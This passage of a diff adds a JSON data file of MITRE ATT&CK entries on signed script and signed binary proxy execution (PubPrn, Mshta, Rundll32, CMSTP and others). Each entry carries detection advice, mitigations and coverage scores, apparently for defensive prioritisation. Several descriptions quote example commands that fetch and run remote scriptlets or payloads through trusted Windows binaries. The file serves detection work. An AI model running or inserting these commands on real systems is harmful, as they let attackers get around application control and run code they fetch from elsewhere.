+                        "url": "https://attack.mitre.org/mitigations/M1038"
+                    }
+                ]
+            }
+        ],
+        "mitigations": [
+            {
+                "mid": "M1038",
+                "name": "Execution Prevention",
+                "description": "Block execution of code on a system through application control, and/or script blocking.",
+                "url": "https://attack.mitre.org/mitigations/M1038"
+            }
+        ],
+        "cumulative_score": 0.25842263238095237,
+        "adjusted_score": 0.25842263238095237,
+        "has_car": false,
+        "has_sigma": true,
+        "has_es_siem": false,
+        "has_splunk": true,
+        "cis_controls": [
+            "2.7"
+        ],
+        "nist_controls": [
+            "CM-2",
+            "CM-6",
+            "CM-7",
+            "SI-10",
+            "SI-4",
+            "SI-7"
+        ],
+        "process_coverage": true,
+        "network_coverage": false,
+        "file_coverage": false,
+        "cloud_coverage": false,
+        "hardware_coverage": false,
+        "actionability_score": {
+            "combined_score": 0.15238095238095237,
+            "mitigation_score": 0.12727272727272726,
+            "detection_score": 0.18
+        },
+        "choke_point_score": 0.1,
+        "prevalence_score": 0.00604168
+    },
+    {
+        "tid": "T1216.001",
+        "name": "Signed Script Proxy Execution: PubPrn",
+        "description": "Adversaries may use PubPrn to proxy execution of malicious remote files. PubPrn.vbs is a [Visual Basic](https://attack.mitre.org/techniques/T1059/005) script that publishes a printer to Active Directory Domain Services. The script is signed by Microsoft and is commonly executed through the [Windows Command Shell](https://attack.mitre.org/techniques/T1059/003) via Cscript.exe. For example, the following code publishes a printer within the specified domain: cscript pubprn Printer1 LDAP://CN=Container1,DC=Domain1,DC=Com.(Citation: pubprn)\n\nAdversaries may abuse PubPrn to execute malicious payloads hosted on remote sites.(Citation: Enigma0x3 PubPrn Bypass) To do so, adversaries may set the second script: parameter to reference a scriptlet file (.sct) hosted on a remote site. An example command is pubprn.vbs 127.0.0.1 script:https://mydomain.com/folder/file.sct. This behavior may bypass signature validation restrictions and application control solutions that do not account for abuse of this script.\n\nIn later versions of Windows (10+), PubPrn.vbs has been updated to prevent proxying execution from a remote site. This is done by limiting the protocol specified in the second parameter to LDAP://, vice the script: moniker which could be used to reference remote code via HTTP(S).",
+        "url": "https://attack.mitre.org/techniques/T1216/001",
+        "tactics": [
+            "Defense Evasion"
+        ],
+        "detection": "Monitor script processes, such as `cscript`, and command-line parameters for scripts like PubPrn.vbs that may be used to proxy execution of malicious files.",
+        "platforms": [
+            "Windows"
+        ],
+        "data_sources": [
+            "Command: Command Execution",
+            "Process: Process Creation",
+            "Script: Script Execution"
+        ],
+        "is_subtechnique": true,
+        "supertechnique": "T1216",
+        "subtechniques": [],
+        "mitigations": [
+            {
+                "mid": "M1040",
+                "name": "Behavior Prevention on Endpoint",
+                "description": "Use capabilities to prevent suspicious behavior patterns from occurring on endpoint systems. This could include suspicious process, file, API call, etc. behavior.",
+                "url": "https://attack.mitre.org/mitigations/M1040"
+            },
+            {
+                "mid": "M1038",
+                "name": "Execution Prevention",
+                "description": "Block execution of code on a system through application control, and/or script blocking.",
+                "url": "https://attack.mitre.org/mitigations/M1038"
+            }
+        ],
+        "cumulative_score": 0.17619047619047618,
+        "adjusted_score": 0.17619047619047618,
+        "has_car": false,
+        "has_sigma": true,
+        "has_es_siem": false,
+        "has_splunk": false,
+        "cis_controls": [
+            "2.7"
+        ],
+        "nist_controls": [
+            "CM-2",
+            "CM-6",
+            "CM-7",
+            "SI-10",
+            "SI-4",
+            "SI-7"
+        ],
+        "process_coverage": true,
+        "network_coverage": false,
+        "file_coverage": false,
+        "cloud_coverage": false,
+        "hardware_coverage": false
+    },
+    {
+        "tid": "T1217",
+        "name": "Browser Bookmark Discovery",
+        "description": "Adversaries may enumerate browser bookmarks to learn more about compromised hosts. Browser bookmarks may reveal personal information about users (ex: banking sites, interests, social media, etc.) as well as details about internal network resources such as servers, tools/dashboards, or other related infrastructure.\n\nBrowser bookmarks may also highlight additional targets after an adversary has access to valid credentials, especially [Credentials In Files](https://attack.mitre.org/techniques/T1552/001) associated with logins cached by a browser.\n\nSpecific storage locations vary based on platform and/or application, but browser bookmarks are typically stored in local files/databases.",
+        "url": "https://attack.mitre.org/techniques/T1217",
+        "tactics": [
+            "Discovery"
+        ],
+        "detection": "Monitor processes and command-line arguments for actions that could be taken to gather browser bookmark information. Remote access tools with built-in features may interact directly using APIs to gather information. Information may also be acquired through system management tools such as [Windows Management Instrumentation](https://attack.mitre.org/techniques/T1047) and [PowerShell](https://attack.mitre.org/techniques/T1059/001).\n\nSystem and network discovery techniques normally occur throughout an operation as an adversary learns the environment. Data and events should not be viewed in isolation, but as part of a chain of behavior that could lead to other activities, such as Collection and Exfiltration, based on the information obtained.",
+        "platforms": [
+            "Linux",
+            "Windows",
+            "macOS"
+        ],
+        "data_sources": [
+            "Command: Command Execution",
+            "File: File Access",
+            "Process: Process Creation"
+        ],
+        "is_subtechnique": false,
+        "supertechnique": null,
+        "subtechniques": [],
+        "mitigations": [],
+        "cumulative_score": 0.1142857142857143,
+        "adjusted_score": 0.1142857142857143,
+        "has_car": false,
+        "has_sigma": true,
+        "has_es_siem": false,
+        "has_splunk": false,
+        "cis_controls": [],
+        "nist_controls": [],
+        "process_coverage": true,
+        "network_coverage": false,
+        "file_coverage": true,
+        "cloud_coverage": false,
+        "hardware_coverage": false,
+        "actionability_score": {
+            "combined_score": 0.014285714285714284,
+            "detection_score": 0.03
+        },
+        "choke_point_score": 0.1,
+        "prevalence_score": 0
+    },
+    {
+        "tid": "T1218",
+        "name": "Signed Binary Proxy Execution",
+        "description": "Adversaries may bypass process and/or signature-based defenses by proxying execution of malicious content with signed binaries. Binaries signed with trusted digital certificates can execute on Windows systems protected by digital signature validation. Several Microsoft signed binaries that are default on Windows installations can be used to proxy execution of other files.",
+        "url": "https://attack.mitre.org/techniques/T1218",
+        "tactics": [
+            "Defense Evasion"
+        ],
+        "detection": "Monitor processes and command-line parameters for signed binaries that may be used to proxy execution of malicious files. Compare recent invocations of signed binaries that may be used to proxy execution with prior history of known good arguments and loaded files to determine anomalous and potentially adversarial activity. Legitimate programs used in suspicious ways, like msiexec.exe downloading an MSI file from the Internet, may be indicative of an intrusion. Correlate activity with other suspicious behavior to reduce false positives that may be due to normal benign use by users and administrators.\n\nMonitor for file activity (creations, downloads, modifications, etc.), especially for file types that are not typical within an environment and may be indicative of adversary activity.",
+        "platforms": [
+            "Windows"
+        ],
+        "data_sources": [
+            "Command: Command Execution",
+            "File: File Creation",
+            "Module: Module Load",
+            "Network Traffic: Network Connection Creation",
+            "Process: OS API Execution",
+            "Process: Process Creation",
+            "Windows Registry: Windows Registry Key Modification"
+        ],
+        "is_subtechnique": false,
+        "supertechnique": null,
+        "subtechniques": [
+            {
+                "tid": "T1218.001",
+                "name": "Signed Binary Proxy Execution: Compiled HTML File",
+                "url": "https://attack.mitre.org/techniques/T1218/001",
+                "description": "Adversaries may abuse Compiled HTML files (.chm) to conceal malicious code. CHM files are commonly distributed as part of the Microsoft HTML Help system. CHM files are compressed compilations of various content such as HTML documents, images, and scripting/web related programming languages such VBA, JScript, Java, and ActiveX. (Citation: Microsoft HTML Help May 2018) CHM content is displayed using underlying components of the Internet Explorer browser (Citation: Microsoft HTML Help ActiveX) loaded by the HTML Help executable program (hh.exe). (Citation: Microsoft HTML Help Executable Program)\n\nA custom CHM file containing embedded payloads could be delivered to a victim then triggered by [User Execution](https://attack.mitre.org/techniques/T1204). CHM execution may also bypass application application control on older and/or unpatched systems that do not account for execution of binaries through hh.exe. (Citation: MsitPros CHM Aug 2017) (Citation: Microsoft CVE-2017-8625 Aug 2017)",
+                "detection": "Monitor and analyze the execution and arguments of hh.exe. (Citation: MsitPros CHM Aug 2017) Compare recent invocations of hh.exe with prior history of known good arguments to determine anomalous and potentially adversarial activity (ex: obfuscated and/or malicious commands). Non-standard process execution trees may also indicate suspicious or malicious behavior, such as if hh.exe is the parent process for suspicious processes and activity relating to other adversarial techniques.\n\nMonitor presence and use of CHM files, especially if they are not typically used within an environment.",
+                "mitigations": [
+                    {
+                        "mid": "M1038",
+                        "name": "Execution Prevention",
+                        "description": "Block execution of code on a system through application control, and/or script blocking.",
+                        "url": "https://attack.mitre.org/mitigations/M1038"
+                    },
+                    {
+                        "mid": "M1021",
+                        "name": "Restrict Web-Based Content",
+                        "description": "Restrict use of certain websites, block downloads/attachments, block Javascript, restrict browser extensions, etc.",
+                        "url": "https://attack.mitre.org/mitigations/M1021"
+                    }
+                ]
+            },
+            {
+                "tid": "T1218.002",
+                "name": "Signed Binary Proxy Execution: Control Panel",
+                "url": "https://attack.mitre.org/techniques/T1218/002",
+                "description": "Adversaries may abuse control.exe to proxy execution of malicious payloads. The Windows Control Panel process binary (control.exe) handles execution of Control Panel items, which are utilities that allow users to view and adjust computer settings.\n\nControl Panel items are registered executable (.exe) or Control Panel (.cpl) files, the latter are actually renamed dynamic-link library (.dll) files that export a CPlApplet function.(Citation: Microsoft Implementing CPL)(Citation: TrendMicro CPL Malware Jan 2014) For ease of use, Control Panel items typically include graphical menus available to users after being registered and loaded into the Control Panel.(Citation: Microsoft Implementing CPL) Control Panel items can be executed directly from the command line, programmatically via an application programming interface (API) call, or by simply double-clicking the file.(Citation: Microsoft Implementing CPL) (Citation: TrendMicro CPL Malware Jan 2014)(Citation: TrendMicro CPL Malware Dec 2013)\n\nMalicious Control Panel items can be delivered via [Phishing](https://attack.mitre.org/techniques/T1566) campaigns(Citation: TrendMicro CPL Malware Jan 2014)(Citation: TrendMicro CPL Malware Dec 2013) or executed as part of multi-stage malware.(Citation: Palo Alto Reaver Nov 2017) Control Panel items, specifically CPL files, may also bypass application and/or file extension allow lists.\n\nAdversaries may also rename malicious DLL files (.dll) with Control Panel file extensions (.cpl) and register them to HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\Control Panel\\Cpls. Even when these registered DLLs do not comply with the CPL file specification and do not export CPlApplet functions, they are loaded and executed through its DllEntryPoint when Control Panel is executed. CPL files not exporting CPlApplet are not directly executable.(Citation: ESET InvisiMole June 2020)",
+                "detection": "Monitor and analyze activity related to items associated with CPL files, such as the control.exe and the Control_RunDLL and ControlRunDLLAsUser API functions in shell32.dll. When executed from the command line or clicked, control.exe will execute the CPL file (ex: control.exe file.cpl) before [Rundll32](https://attack.mitre.org/techniques/T1218/011) is used to call the CPL's API functions (ex: rundll32.exe shell32.dll,Control_RunDLL file.cpl). CPL files can be executed directly via the CPL API function with just the latter [Rundll32](https://attack.mitre.org/techniques/T1218/011) command, which may bypass detections and/or execution filters for control.exe.(Citation: TrendMicro CPL Malware Jan 2014)\n\nInventory Control Panel items to locate unregistered and potentially malicious files present on systems:\n\n* Executable format registered Control Panel items will have a globally unique identifier (GUID) and registration Registry entries in HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Explorer\\ControlPanel\\NameSpace and HKEY_CLASSES_ROOT\\CLSID\\{GUID}. These entries may contain information about the Control Panel item such as its display name, path to the local file, and the command executed when opened in the Control Panel. (Citation: Microsoft Implementing CPL)\n* CPL format registered Control Panel items stored in the System32 directory are automatically shown in the Control Panel. Other Control Panel items will have registration entries in the CPLs and Extended Properties Registry keys of HKEY_LOCAL_MACHINE or HKEY_CURRENT_USER\\Software\\Microsoft\\Windows\\CurrentVersion\\Control Panel. These entries may include information such as a GUID, path to the local file, and a canonical name used to launch the file programmatically ( WinExec(\"c:\\windows\\system32\\control.exe {Canonical_Name}\", SW_NORMAL);) or from a command line (control.exe /name {Canonical_Name}).(Citation: Microsoft Implementing CPL)\n* Some Control Panel items are extensible via Shell extensions registered in HKEY_LOCAL_MACHINE\\Software\\Microsoft\\Windows\\CurrentVersion\\Controls Folder\\{name}\\Shellex\\PropertySheetHandlers where {name} is the predefined name of the system item.(Citation: Microsoft Implementing CPL)\n\nAnalyze new Control Panel items as well as those present on disk for malicious content. Both executable and CPL formats are compliant Portable Executable (PE) images and can be examined using traditional tools and methods, pending anti-reverse-engineering techniques.(Citation: TrendMicro CPL Malware Jan 2014)",
+                "mitigations": [
+                    {
+                        "mid": "M1038",
+                        "name": "Execution Prevention",
+                        "description": "Block execution of code on a system through application control, and/or script blocking.",
+                        "url": "https://attack.mitre.org/mitigations/M1038"
+                    },
+                    {
+                        "mid": "M1022",
+                        "name": "Restrict File and Directory Permissions",
+                        "description": "Restrict access by setting directory and file permissions that are not specific to users or privileged accounts.",
+                        "url": "https://attack.mitre.org/mitigations/M1022"
+                    }
+                ]
+            },
+            {
+                "tid": "T1218.003",
+                "name": "Signed Binary Proxy Execution: CMSTP",
+                "url": "https://attack.mitre.org/techniques/T1218/003",
+                "description": "Adversaries may abuse CMSTP to proxy execution of malicious code. The Microsoft Connection Manager Profile Installer (CMSTP.exe) is a command-line program used to install Connection Manager service profiles. (Citation: Microsoft Connection Manager Oct 2009) CMSTP.exe accepts an installation information file (INF) as a parameter and installs a service profile leveraged for remote access connections.\n\nAdversaries may supply CMSTP.exe with INF files infected with malicious commands. (Citation: Twitter CMSTP Usage Jan 2018) Similar to [Regsvr32](https://attack.mitre.org/techniques/T1218/010) / ”Squiblydoo”, CMSTP.exe may be abused to load and execute DLLs (Citation: MSitPros CMSTP Aug 2017)  and/or COM scriptlets (SCT) from remote servers. (Citation: Twitter CMSTP Jan 2018) (Citation: GitHub Ultimate AppLocker Bypass List) (Citation: Endurant CMSTP July 2018) This execution may also bypass AppLocker and other application control defenses since CMSTP.exe is a legitimate, signed Microsoft application.\n\nCMSTP.exe can also be abused to [Bypass User Account Control](https://attack.mitre.org/techniques/T1548/002) and execute arbitrary commands from a malicious INF through an auto-elevated COM interface. (Citation: MSitPros CMSTP Aug 2017) (Citation: GitHub Ultimate AppLocker Bypass List) (Citation: Endurant CMSTP July 2018)",
+                "detection": "Use process monitoring to detect and analyze the execution and arguments of CMSTP.exe. Compare recent invocations of CMSTP.exe with prior history of known good arguments and loaded files to determine anomalous and potentially adversarial activity.\n\nSysmon events can also be used to identify potential abuses of CMSTP.exe. Detection strategy may depend on the specific adversary procedure, but potential rules include: (Citation: Endurant CMSTP July 2018)\n\n* To detect loading and execution of local/remote payloads - Event 1 (Process creation) where ParentImage contains CMSTP.exe and/or Event 3 (Network connection) where Image contains CMSTP.exe and DestinationIP is external.\n* To detect [Bypass User Account Control](https://attack.mitre.org/techniques/T1548/002) via an auto-elevated COM interface - Event 10 (ProcessAccess) where CallTrace contains CMLUA.dll and/or Event 12 or 13 (RegistryEvent) where TargetObject contains CMMGR32.exe. Also monitor for events, such as the creation of processes (Sysmon Event 1), that involve auto-elevated CMSTP COM interfaces such as CMSTPLUA (3E5FC7F9-9A51-4367-9063-A120244FBEC7) and CMLUAUTIL (3E000D72-A845-4CD9-BD83-80C07C3B881F).",
+                "mitigations": [
+                    {
+                        "mid": "M1042",
+                        "name": "Disable or Remove Feature or Program",
+                        "description": "Remove or deny access to unnecessary and potentially vulnerable software to prevent abuse by adversaries.",
+                        "url": "https://attack.mitre.org/mitigations/M1042"
+                    },
+                    {
+                        "mid": "M1038",
+                        "name": "Execution Prevention",
+                        "description": "Block execution of code on a system through application control, and/or script blocking.",
+                        "url": "https://attack.mitre.org/mitigations/M1038"
+                    }
+                ]
+            },
+            {
+                "tid": "T1218.004",
+                "name": "Signed Binary Proxy Execution: InstallUtil",
+                "url": "https://attack.mitre.org/techniques/T1218/004",
+                "description": "Adversaries may use InstallUtil to proxy execution of code through a trusted Windows utility. InstallUtil is a command-line utility that allows for installation and uninstallation of resources by executing specific installer components specified in .NET binaries. (Citation: MSDN InstallUtil) InstallUtil is digitally signed by Microsoft and located in the .NET directories on a Windows system: C:\\Windows\\Microsoft.NET\\Framework\\v\\InstallUtil.exe and C:\\Windows\\Microsoft.NET\\Framework64\\v\\InstallUtil.exe.\n\nInstallUtil may also be used to bypass application control through use of attributes within the binary that execute the class decorated with the attribute [System.ComponentModel.RunInstaller(true)]. (Citation: LOLBAS Installutil)",
+                "detection": "Use process monitoring to monitor the execution and arguments of InstallUtil.exe. Compare recent invocations of InstallUtil.exe with prior history of known good arguments and executed binaries to determine anomalous and potentially adversarial activity. Command arguments used before and after the InstallUtil.exe invocation may also be useful in determining the origin and purpose of the binary being executed.",
+                "mitigations": [
+                    {
+                        "mid": "M1042",
+                        "name": "Disable or Remove Feature or Program",
+                        "description": "Remove or deny access to unnecessary and potentially vulnerable software to prevent abuse by adversaries.",
+                        "url": "https://attack.mitre.org/mitigations/M1042"
+                    },
+                    {
+                        "mid": "M1038",
+                        "name": "Execution Prevention",
+                        "description": "Block execution of code on a system through application control, and/or script blocking.",
+                        "url": "https://attack.mitre.org/mitigations/M1038"
+                    }
+                ]
+            },
+            {
+                "tid": "T1218.005",
+                "name": "Signed Binary Proxy Execution: Mshta",
+                "url": "https://attack.mitre.org/techniques/T1218/005",
+                "description": "Adversaries may abuse mshta.exe to proxy execution of malicious .hta files and Javascript or VBScript through a trusted Windows utility. There are several examples of different types of threats leveraging mshta.exe during initial compromise and for execution of code (Citation: Cylance Dust Storm) (Citation: Red Canary HTA Abuse Part Deux) (Citation: FireEye Attacks Leveraging HTA) (Citation: Airbus Security Kovter Analysis) (Citation: FireEye FIN7 April 2017) \n\nMshta.exe is a utility that executes Microsoft HTML Applications (HTA) files. (Citation: Wikipedia HTML Application) HTAs are standalone applications that execute using the same models and technologies of Internet Explorer, but outside of the browser. (Citation: MSDN HTML Applications)\n\nFiles may be executed by mshta.exe through an inline script: mshta vbscript:Close(Execute(\"GetObject(\"\"script:https[:]//webserver/payload[.]sct\"\")\"))\n\nThey may also be executed directly from URLs: mshta http[:]//webserver/payload[.]hta\n\nMshta.exe can be used to bypass application control solutions that do not account for its potential use. Since mshta.exe executes outside of the Internet Explorer's security context, it also bypasses browser security settings. (Citation: LOLBAS Mshta)",
+                "detection": "Use process monitoring to monitor the execution and arguments of mshta.exe. Look for mshta.exe executing raw or obfuscated script within the command-line. Compare recent invocations of mshta.exe with prior history of known good arguments and executed .hta files to determine anomalous and potentially adversarial activity. Command arguments used before and after the mshta.exe invocation may also be useful in determining the origin and purpose of the .hta file being executed.\n\nMonitor use of HTA files. If they are not typically used within an environment then execution of them may be suspicious",
+                "mitigations": [
+                    {
+                        "mid": "M1042",
+                        "name": "Disable or Remove Feature or Program",
+                        "description": "Remove or deny access to unnecessary and potentially vulnerable software to prevent abuse by adversaries.",
+                        "url": "https://attack.mitre.org/mitigations/M1042"
+                    },
+                    {
+                        "mid": "M1038",
+                        "name": "Execution Prevention",
+                        "description": "Block execution of code on a system through application control, and/or script blocking.",
+                        "url": "https://attack.mitre.org/mitigations/M1038"
+                    }
+                ]
+            },
+            {
+                "tid": "T1218.007",
+                "name": "Signed Binary Proxy Execution: Msiexec",
+                "url": "https://attack.mitre.org/techniques/T1218/007",
+                "description": "Adversaries may abuse msiexec.exe to proxy execution of malicious payloads. Msiexec.exe is the command-line utility for the Windows Installer and is thus commonly associated with executing installation packages (.msi).(Citation: Microsoft msiexec) Msiexec.exe is digitally signed by Microsoft.\n\nAdversaries may abuse msiexec.exe to launch local or network accessible MSI files. Msiexec.exe can also execute DLLs.(Citation: LOLBAS Msiexec)(Citation: TrendMicro Msiexec Feb 2018) Since it is signed and native on Windows systems, msiexec.exe can be used to bypass application control solutions that do not account for its potential abuse. Msiexec.exe execution may also be elevated to SYSTEM privileges if the AlwaysInstallElevated policy is enabled.(Citation: Microsoft AlwaysInstallElevated 2018)",
+                "detection": "Use process monitoring to monitor the execution and arguments of msiexec.exe. Compare recent invocations of msiexec.exe with prior history of known good arguments and executed MSI files or DLLs to determine anomalous and potentially adversarial activity. Command arguments used before and after the invocation of msiexec.exe may also be useful in determining the origin and purpose of the MSI files or DLLs being executed.",
+                "mitigations": [
+                    {
+                        "mid": "M1042",
+                        "name": "Disable or Remove Feature or Program",
+                        "description": "Remove or deny access to unnecessary and potentially vulnerable software to prevent abuse by adversaries.",
+                        "url": "https://attack.mitre.org/mitigations/M1042"
+                    },
+                    {
+                        "mid": "M1026",
+                        "name": "Privileged Account Management",
+                        "description": "Manage the creation, modification, use, and permissions associated to privileged accounts, including SYSTEM and root.",
+                        "url": "https://attack.mitre.org/mitigations/M1026"
+                    }
+                ]
+            },
+            {
+                "tid": "T1218.008",
+                "name": "Signed Binary Proxy Execution: Odbcconf",
+                "url": "https://attack.mitre.org/techniques/T1218/008",
+                "description": "Adversaries may abuse odbcconf.exe to proxy execution of malicious payloads. Odbcconf.exe is a Windows utility that allows you to configure Open Database Connectivity (ODBC) drivers and data source names.(Citation: Microsoft odbcconf.exe) Odbcconf.exe is digitally signed by Microsoft.\n\nAdversaries may abuse odbcconf.exe to bypass application control solutions that do not account for its potential abuse. Similar to [Regsvr32](https://attack.mitre.org/techniques/T1218/010), odbcconf.exe has a REGSVR flag that can be misused to execute DLLs (ex: odbcconf.exe /S /A {REGSVR \"C:\\Users\\Public\\file.dll\"}). (Citation: LOLBAS Odbcconf)(Citation: TrendMicro Squiblydoo Aug 2017)(Citation: TrendMicro Cobalt Group Nov 2017) \n",
+                "detection": "Use process monitoring to monitor the execution and arguments of odbcconf.exe. Compare recent invocations of odbcconf.exe with prior history of known good arguments and loaded DLLs to determine anomalous and potentially adversarial activity. Command arguments used before and after the invocation of odbcconf.exe may also be useful in determining the origin and purpose of the DLL being loaded.",
+                "mitigations": [
+                    {
+                        "mid": "M1042",
+                        "name": "Disable or Remove Feature or Program",
+                        "description": "Remove or deny access to unnecessary and potentially vulnerable software to prevent abuse by adversaries.",
+                        "url": "https://attack.mitre.org/mitigations/M1042"
+                    },
+                    {
+                        "mid": "M1038",
+                        "name": "Execution Prevention",
+                        "description": "Block execution of code on a system through application control, and/or script blocking.",
+                        "url": "https://attack.mitre.org/mitigations/M1038"
+                    }
+                ]
+            },
+            {
+                "tid": "T1218.009",
+                "name": "Signed Binary Proxy Execution: Regsvcs/Regasm",
+                "url": "https://attack.mitre.org/techniques/T1218/009",
+                "description": "Adversaries may abuse Regsvcs and Regasm to proxy execution of code through a trusted Windows utility. Regsvcs and Regasm are Windows command-line utilities that are used to register .NET [Component Object Model](https://attack.mitre.org/techniques/T1559/001) (COM) assemblies. Both are digitally signed by Microsoft. (Citation: MSDN Regsvcs) (Citation: MSDN Regasm)\n\nBoth utilities may be used to bypass application control through use of attributes within the binary to specify code that should be run before registration or unregistration: [ComRegisterFunction] or [ComUnregisterFunction] respectively. The code with the registration and unregistration attributes will be executed even if the process is run under insufficient privileges and fails to execute. (Citation: LOLBAS Regsvcs)(Citation: LOLBAS Regasm)",
+                "detection": "Use process monitoring to monitor the execution and arguments of Regsvcs.exe and Regasm.exe. Compare recent invocations of Regsvcs.exe and Regasm.exe with prior history of known good arguments and executed binaries to determine anomalous and potentially adversarial activity. Command arguments used before and after Regsvcs.exe or Regasm.exe invocation may also be useful in determining the origin and purpose of the binary being executed.",
+                "mitigations": [
+                    {
+                        "mid": "M1042",
+                        "name": "Disable or Remove Feature or Program",
+                        "description": "Remove or deny access to unnecessary and potentially vulnerable software to prevent abuse by adversaries.",
+                        "url": "https://attack.mitre.org/mitigations/M1042"
+                    },
+                    {
+                        "mid": "M1038",
+                        "name": "Execution Prevention",
+                        "description": "Block execution of code on a system through application control, and/or script blocking.",
+                        "url": "https://attack.mitre.org/mitigations/M1038"
+                    }
+                ]
+            },
+            {
+                "tid": "T1218.010",
+                "name": "Signed Binary Proxy Execution: Regsvr32",
+                "url": "https://attack.mitre.org/techniques/T1218/010",
+                "description": "Adversaries may abuse Regsvr32.exe to proxy execution of malicious code. Regsvr32.exe is a command-line program used to register and unregister object linking and embedding controls, including dynamic link libraries (DLLs), on Windows systems. Regsvr32.exe is also a Microsoft signed binary. (Citation: Microsoft Regsvr32)\n\nMalicious usage of Regsvr32.exe may avoid triggering security tools that may not monitor execution of, and modules loaded by, the regsvr32.exe process because of allowlists or false positives from Windows using regsvr32.exe for normal operations. Regsvr32.exe can also be used to specifically bypass application control using functionality to load COM scriptlets to execute DLLs under user permissions. Since Regsvr32.exe is network and proxy aware, the scripts can be loaded by passing a uniform resource locator (URL) to file on an external Web server as an argument during invocation. This method makes no changes to the Registry as the COM object is not actually registered, only executed. (Citation: LOLBAS Regsvr32) This variation of the technique is often referred to as a \"Squiblydoo\" attack and has been used in campaigns targeting governments. (Citation: Carbon Black Squiblydoo Apr 2016) (Citation: FireEye Regsvr32 Targeting Mongolian Gov)\n\nRegsvr32.exe can also be leveraged to register a COM Object used to establish persistence via [Component Object Model Hijacking](https://attack.mitre.org/techniques/T1546/015). (Citation: Carbon Black Squiblydoo Apr 2016)",
+                "detection": "Use process monitoring to monitor the execution and arguments of regsvr32.exe. Compare recent invocations of regsvr32.exe with prior history of known good arguments and loaded files to determine anomalous and potentially adversarial activity. Command arguments used before and after the regsvr32.exe invocation may also be useful in determining the origin and purpose of the script or DLL being loaded. (Citation: Carbon Black Squiblydoo Apr 2016)",
+                "mitigations": [
+                    {
+                        "mid": "M1050",
+                        "name": "Exploit Protection",
+                        "description": "Use capabilities to detect and block conditions that may lead to or be indicative of a software exploit occurring.",
+                        "url": "https://attack.mitre.org/mitigations/M1050"
+                    }
+                ]
+            },
+            {
+                "tid": "T1218.011",
+                "name": "Signed Binary Proxy Execution: Rundll32",
+                "url": "https://attack.mitre.org/techniques/T1218/011",
+                "description": "Adversaries may abuse rundll32.exe to proxy execution of malicious code. Using rundll32.exe, vice executing directly (i.e. [Shared Modules](https://attack.mitre.org/techniques/T1129)), may avoid triggering security tools that may not monitor execution of the rundll32.exe process because of allowlists or false positives from normal operations. Rundll32.exe is commonly associated with executing DLL payloads (ex: rundll32.exe {DLLname, DLLfunction}).\n\nRundll32.exe can also be used to execute [Control Panel](https://attack.mitre.org/techniques/T1218/002) Item files (.cpl) through the undocumented shell32.dll functions Control_RunDLL and Control_RunDLLAsUser. Double-clicking a .cpl file also causes rundll32.exe to execute. (Citation: Trend Micro CPL)\n\nRundll32 can also be used to execute scripts such as JavaScript. This can be done using a syntax similar to this: rundll32.exe javascript:\"\\..\\mshtml,RunHTMLApplication \";document.write();GetObject(\"script:https[:]//www[.]example[.]com/malicious.sct\")\"  This behavior has been seen used by malware such as Poweliks. (Citation: This is Security Command Line Confusion)\n\nAdversaries may also attempt to obscure malicious code from analysis by abusing the manner in which rundll32.exe loads DLL function names. As part of Windows compatibility support for various character sets, rundll32.exe will first check for wide/Unicode then ANSI character-supported functions before loading the specified function (e.g., given the command rundll32.exe ExampleDLL.dll, ExampleFunction, rundll32.exe would first attempt to execute ExampleFunctionW, or failing that ExampleFunctionA, before loading ExampleFunction). Adversaries may therefore obscure malicious code by creating multiple identical exported function names and appending W and/or A to harmless ones.(Citation: Attackify Rundll32.exe Obscurity)(Citation: Github NoRunDll)",
+                "detection": "Use process monitoring to monitor the execution and arguments of rundll32.exe. Compare recent invocations of rundll32.exe with prior history of known good arguments and loaded DLLs to determine anomalous and potentially adversarial activity.\n\nCommand arguments used with the rundll32.exe invocation may also be useful in determining the origin and purpose of the DLL being loaded. Analyzing DLL exports and comparing to runtime arguments may be useful in uncovering obfuscated function calls.",
+                "mitigations": [
+                    {
+                        "mid": "M1050",
+                        "name": "Exploit Protection",
+                        "description": "Use capabilities to detect and block conditions that may lead to or be indicative of a software exploit occurring.",
+                        "url": "https://attack.mitre.org/mitigations/M1050"
+                    }
+                ]
+            },
+            {
+                "tid": "T1218.012",
+                "name": "Signed Binary Proxy Execution: Verclsid",
+                "url": "https://attack.mitre.org/techniques/T1218/012",
+                "description": "Adversaries may abuse verclsid.exe to proxy execution of malicious code. Verclsid.exe is known as the Extension CLSID Verification Host and is responsible for verifying each shell extension before they are used by Windows Explorer or the Windows Shell.(Citation: WinOSBite verclsid.exe)\n\nAdversaries may abuse verclsid.exe to execute malicious payloads. This may be achieved by running verclsid.exe /S /C {CLSID}, where the file is referenced by a Class ID (CLSID), a unique identification number used to identify COM objects. COM payloads executed by verclsid.exe may be able to perform various malicious actions, such as loading and executing COM scriptlets (SCT) from remote servers (similar to [Regsvr32](https://attack.mitre.org/techniques/T1218/010)). Since it is signed and native on Windows systems, proxying execution via verclsid.exe may bypass application control solutions that do not account for its potential abuse.(Citation: LOLBAS Verclsid)(Citation: Red Canary Verclsid.exe)(Citation: BOHOPS Abusing the COM Registry)(Citation: Nick Tyrer GitHub) ",
+                "detection": "Use process monitoring to monitor the execution and arguments of verclsid.exe. Compare recent invocations of verclsid.exe with prior history of known good arguments and loaded files to determine anomalous and potentially adversarial activity. Command arguments used before and after the invocation of verclsid.exe may also be useful in determining the origin and purpose of the payload being executed. Depending on the environment, it may be unusual for verclsid.exe to have a parent process of a Microsoft Office product. It may also be unusual for verclsid.exe to have any child processes or to make network connections or file modifications.",
+                "mitigations": [
+                    {
+                        "mid": "M1042",
+                        "name": "Disable or Remove Feature or Program",
+                        "description": "Remove or deny access to unnecessary and potentially vulnerable software to prevent abuse by adversaries.",
+                        "url": "https://attack.mitre.org/mitigations/M1042"
+                    },
+                    {
+                        "mid": "M1038",
+                        "name": "Execution Prevention",
+                        "description": "Block execution of code on a system through application control, and/or script blocking.",
+                        "url": "https://attack.mitre.org/mitigations/M1038"
+                    },
+                    {
+                        "mid": "M1037",
+                        "name": "Filter Network Traffic",
+                        "description": "Use network appliances to filter ingress or egress traffic and perform protocol-based filtering. Configure software on endpoints to filter network traffic.",
+                        "url": "https://attack.mitre.org/mitigations/M1037"
+                    }
+                ]
+            },
+            {
+                "tid": "T1218.013",
+                "name": "Signed Binary Proxy Execution: Mavinject",
+                "url": "https://attack.mitre.org/techniques/T1218/013",
